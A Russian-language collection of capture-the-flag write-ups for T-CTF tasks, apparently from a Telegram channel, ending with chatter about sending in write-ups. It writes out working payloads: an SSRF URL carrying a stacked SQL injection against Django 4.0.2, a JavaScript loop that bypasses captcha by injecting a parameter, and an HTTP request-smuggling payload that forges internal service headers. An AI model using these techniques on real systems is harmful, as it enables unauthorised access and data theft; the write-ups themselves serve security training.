Биба и Боба

Судя по коду, флаг лежит в таблице core_parameters в строке с name='DEBUG_KEY'.

Уязвимость 1. Обращаем внимание, что используется старая версия Django 4.0.2. Смотрим changelog Django и находим сообщение об исправлении SQL-инъекции в более поздней версии: https://docs.djangoproject.com/en/5.0/releases/4.0.6/. Уязвимый код используется на странице /users/, но она требует авторизации.

Уязвимость 2. Страница /users прикрыта кодом, который пропускает запросы с IP 127.0.0.1, при этом не проверяется, что пользователь залогинен.

Уязвимость 3. Код загрузки аватара по ссылке позволяет отправить GET-запрос на любой адрес, в том числе на 127.0.0.1. Там есть проверка, что адрес заканчивается на расширение картинки, но его можно легко обойти, добавив ?.jpg в конце адреса.

Как воспользоваться уязвимостями:

1. Создаём пользователя обычным образом. Для примера его username будет HACKER.

2. Загружаем ему аватарку по этому URL:

http://127.0.0.1:8000/users/?joined=year'%20FROM%20date_joined)FROM%20core_user%3BUPDATE%20core_user%20SET%20last_name%3D(SELECT%20value%20FROM%20core_parameter%20WHERE%20name%3D'DEBUG_KEY')%20WHERE%20username%3D'HACKER'--&.jpg

Обратите внимание что в адресе в конце указано имя нашего пользователя.

3. Идём на страницу /profile и видим там флаг.

#ёклмн от @surgie

ЁКЛМН

Надо автоматизировать открытие мусорок, обойдя каптчу.

В файле check_bin.php видно, что у токена каптчи слабая валидация, и он не экранируется при вставке в запрос на сервер каптчи. Можно использовать это, чтобы добавить в запрос параметр idempotency_key=<constant_UUID>. Этот параметр позволяет сделать так, чтобы сервер каптчи одобрял много запросов на проверку с одинаковым токеном.

Далее в браузере на странице https://t-aandb-j58o5s3y.spbctf.net/?open=1 перехатываем токен каптчи и не даём ему улететь на сервер (это можно сделать, поставив брейкпоинт в девтулзах). Там же нужно взять куку сессии.

Затем отправляем запрос с «хакнутым» токеном в каждую мусорку, чтобы открыть её:

for (let binNum = 1; binNum <= 2000; binNum++) {
  fetch(host, {
    method: 'POST',
    headers: {
      Cookie: cookies,
      'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: `open=${binNum}&token=${encodeURIComponent(`${captchaResponse}&idempotency_key=550e8400-e29b-41d4-a716-446655440000`)}`,
    redirect: 'manual',
  })
}

После этого флаг появится на главной странице.

#czf от @Ggttyypp

Имеем: Три микросервсиа общаются между собой по tls, что-то типо сервис меша.
1. Gateway - представляет из себя реверс прокси, также проверяет серты если подключение идет с другого сервиса.
2. User Info - микросервис по управлению информацией о пользователе
3. Shop - можем тут купить тему, сделать клик и купить премиум

Видим, что shop при покупке премиума просто проставляет множитель для юзера.
Попробуем дернуть так же эту ручку с сертом client.crt, но ничего не получим, так как apigateway скорее всего сидит за балансер, сюда по docker-compose.yaml.

params = fmt.Sprintf("multiplier=%d", 10)
client.Post("https://apigateway:9443/api/setUserMultiplier?" + params, headers)

Так же посмотрим как он делает Post запрос

host := "apigateway:9443"
conn, err := tls.Dial("tcp", host, c.Config)
if err != nil {
  return "", []byte{}, err
}
defer conn.Close()
request := fmt.Sprintf("POST %s HTTP/1.1\r\nHost: %s\r\n", urlString, host)

Видим, что если будем контролироваь один из %s, то сможем засплитить запрос.
Ищем в коде через что мы можем засплитить запрос, видим что color отправляется как строка в ручку /api/buyColor, пробуем в ручку вставить такую строку

Также вспоминаем как создается User-Id

sessionValue := createAndSignSession(string(userInfoRow.UserID))
c.SetCookie("session", sessionValue, 3600000, "", "", false, false)

func createAndSignSession(userID string) string {
  ...
  return string(payload) + "." + string(hex.EncodeToString(expectedMAC))
}

то есть нам нужно значение до первой точки.

black HTTP/1.1
Host: apigateway:9443
X-From-Service: Yes
X-User-ID: <user-uuid-from-cookie>

POST /api/setUserMultiplier?multiplier=100000 HTTP/1.1
Host: apigateway:9443
X-From-Service: Yes
X-User-ID: <user-uuid-from-cookie>

Важно заметить, что не ставим Connection: close, как в оригинальном запросе, чтобы соединение не закрылось.
Делал все в Burp, так что скриптов нет никаких.
Писал эту строчку на память, так как не сохранил.

#человекжук от @Veryvery

#человекжук
По этому заданию количество комбинаций можно сократить до 54264 для подбора.
Смотрим алгоритм шифровани, раз играем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципе base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 54264 варианта, скармливаем архив Джеку рипперу с этим вордлистом, получаем результат за считанные секунды

автор прислал более компактное решение

curl -X PUT https://t-digduper-scx3wg9q.spbctf.net/api/cloner/62a02f86-9c99-432f-bb8e-0f8915baf840 -H "Content-Type: application/json" -d '{"config": {"count": 199999, "timeout": 30}}'

это корректиное решение, там еднственная тонкость что каунт до 200 000 и надо меньше. 200000 - входит в множество

#человекжук от @GalaGoldking

1. Регаешься на сайте
2. Потом заходишь в админ панель с помощью
https://t-bugman-rhioogh9.spbctf.net/docs
3. Там есть GET /bugman-photos-stash-20240328
4. Try it out.
5. Там загружается страница и там сразу флаг

#человекжук
По этому заданию количество комбинаций можно сократить до 16млн для подбора.
Смотрим алгоритм шифровани, разбиваем на составные части, там видим, что для кодирования в base64 подаётся всегда комбинация из 6 символов, причем строка строится алгоритмом md5, который подразумевает использование только 16 символов (1234567890abcdef). Пишем скрипт, который генерирует wordlist для jack the ripper по принципу base64(123abc) -> MTIzYWJj бежим по этим значениям, получаем 16 млн варианта, скармливаем архив Джеку рипперу с этим вордлистом.

исправленная версия с 16 млн

39 дней, значит, до Капибаровска
хм

T-CTF, походу, решили отменить... :(

Источник: я календарь пересмотрю, а там апрель ведь начался

9 часов вечера

Все райтапы по поводу T-CTF 2025 просьба традиционно скидывать мне в личку: @EvgenyKurmysa
Раз уж все задачи называются по типу "Капибада", "Капикойн" и т.д., то к райтапам просьба добавлять название таски с хэштегом В НАЧАЛЕ, вот так: #капипример

солянка из райтапов